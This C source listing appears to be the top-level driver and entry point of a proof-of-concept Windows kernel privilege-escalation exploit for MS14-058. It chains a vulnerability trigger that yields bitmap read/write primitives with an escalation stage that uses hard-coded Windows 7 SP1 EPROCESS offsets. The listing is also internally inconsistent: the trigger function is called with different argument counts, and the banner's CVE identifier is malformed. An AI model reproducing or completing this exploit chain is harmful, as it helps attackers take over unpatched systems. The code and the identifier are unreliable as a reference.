// TriggerExploit - top-level driver for this proof of concept.
//
// Runs two stages that are defined elsewhere in the project:
//   1. TriggerVulnerability(), which receives the current PEB and hands back
//      two bitmap handles (a "manager" and a "worker"). Per the log text,
//      these act as read/write primitives from this point on.
//   2. TriggerPrivilegeEscalation(), which takes both handles plus a pair of
//      hard-coded EPROCESS offsets.
//
// Returns TRUE only if both stages report success; FALSE as soon as any step
// fails, after logging which one.
//
// NOTE(review): the "[+]"/"[-]" status strings below are fixed literals, so
// they may serve as static indicators when triaging a compiled sample.
// NOTE(review): neither bitmap handle is released on any path here; whether
// a callee takes ownership is not visible in this listing.
BOOLEAN TriggerExploit(VOID)
{
    // The variable name ties these two offsets to Windows 7 SP1. Which
    // EPROCESS field each one refers to is set by the EPROCESS_OFFSETS
    // layout, which is not shown here. Nothing visible in this function
    // checks the running OS build before they are used.
    EPROCESS_OFFSETS offsetsWin7Sp1 = { 0x180, 0x208 };
    HBITMAP managerBitmap, workerBitmap;
    PPEB currentPeb;

    LOG("\n");

    currentPeb = GetCurrentPeb();
    if (!currentPeb) {
        LOG("[-] Unable To Get The Current PEB\n");
        return FALSE;
    }

    // Stage 1: on success the callee has filled in both handles.
    if (!TriggerVulnerability(currentPeb, &managerBitmap, &workerBitmap)) {
        LOG("[-] Unable To Trigger Vulnerability\n");
        return FALSE;
    }

    LOG("[+] Vulnerability Triggered\n");
    LOG("[+] Bitmap Read/Write Primitives Now Available\n");

    // Stage 2: consumes the handles together with the build-specific offsets.
    if (!TriggerPrivilegeEscalation(managerBitmap, workerBitmap, &offsetsWin7Sp1)) {
        LOG("[-] Unable To Trigger Exploit\n");
        return FALSE;
    }

    LOG("[+] Privilege Escalation Triggered\n\n");
    return TRUE;
}
// Program entry point: prints the ASCII-art banner, then starts the
// proof of concept.
//
// argc and argv are accepted but never read.
//
// NOTE(review): TriggerVulnerability() is called here with no arguments,
// while TriggerExploit() in the same listing calls it with three. The two
// snippets may come from different revisions; as shown they do not agree.
// NOTE(review): the callee's result is discarded, so the process always
// exits with EXIT_SUCCESS and the exit status says nothing about the outcome.
// NOTE(review): the CVE identifier in the banner looks malformed (one digit
// too many); verify it against the MS14-058 bulletin before citing it.
INT main(UINT argc, PTCHAR argv[])
{
    CONST PTCHAR asciiBanner =
        " \n"
        " # # ##### ####### \n"
        " # # ## #### # # # # # # #### # ###### ## # #\n"
        " # # # # # # # # # # # # # # # # ## ##\n"
        " ####### # # # #### ##### # #### # ##### # # # ## #\n"
        " # # ###### # # # # # # # # ###### # #\n"
        " # # # # # # # # # # # # # # # # # # #\n"
        " # # # # #### # # ##### # #### # ###### # # # #\n"
        " \n"
        " CVE-2014-41143 / MS14-058 \n"
        " \n";

    // Show the banner first. It is passed as the macro's first argument, so
    // it is only safe as long as the text holds no format specifiers
    // (assuming DEBUG_MESSAGE is printf-like; its definition is not shown).
    DEBUG_MESSAGE(asciiBanner);

    TriggerVulnerability();

    return EXIT_SUCCESS;
}